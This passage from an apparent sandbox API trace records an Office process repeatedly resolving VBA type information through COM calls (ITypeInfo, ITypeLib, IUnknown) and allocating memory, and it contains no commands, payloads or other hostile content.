pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.552] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.552] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.552] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3ad0 [0060.552] _mbscpy_s (in: _Dst=0x1d39dbb3ad0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3ad0) returned 0x0 [0060.552] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.552] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.552] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.552] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.552] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.552] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.552] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.552] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3ad0) [0060.552] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.552] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.552] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.552] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.552] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.552] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.552] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.552] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b90 [0060.552] _mbscpy_s (in: _Dst=0x1d39dbb3b90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b90) returned 0x0 [0060.553] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.553] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.553] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.553] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.553] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.553] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.553] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.553] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b90) [0060.553] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.553] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.553] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.553] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.553] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.553] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.553] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.553] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b10 [0060.553] _mbscpy_s (in: _Dst=0x1d39dbb3b10, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b10) returned 0x0 [0060.553] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.553] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.553] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.553] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.553] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.553] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.553] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.553] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b10) [0060.553] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.553] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.553] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.553] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.554] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.554] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.554] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.554] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3970 [0060.554] _mbscpy_s (in: _Dst=0x1d39dbb3970, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3970) returned 0x0 [0060.554] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.554] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.554] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.554] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.554] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.554] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.554] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.554] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3970) [0060.554] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.554] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.554] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.554] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.554] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.554] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.554] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.554] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b10 [0060.554] _mbscpy_s (in: _Dst=0x1d39dbb3b10, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b10) returned 0x0 [0060.554] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.554] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.554] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.554] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.554] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.555] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.555] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.555] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b10) [0060.555] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.555] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.555] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.555] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.555] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.555] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.555] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.555] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3970 [0060.555] _mbscpy_s (in: _Dst=0x1d39dbb3970, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3970) returned 0x0 [0060.555] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.555] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.555] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.555] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.555] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.555] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.555] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.555] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3970) [0060.555] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.555] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.555] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.555] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.555] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.555] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.555] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.555] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3eb0 [0060.556] _mbscpy_s (in: _Dst=0x1d39dbb3eb0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3eb0) returned 0x0 [0060.556] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.556] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.556] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.556] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.556] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.556] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.556] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.556] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3eb0) [0060.556] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3da0000 [0060.556] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.557] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.557] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.557] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.557] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.557] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.557] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.557] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b10 [0060.557] _mbscpy_s (in: _Dst=0x1d39dbb3b10, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b10) returned 0x0 [0060.557] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.557] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.557] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.557] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.557] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.557] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.557] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.557] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b10) [0060.557] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.557] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.557] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.557] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.557] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.557] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.557] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, 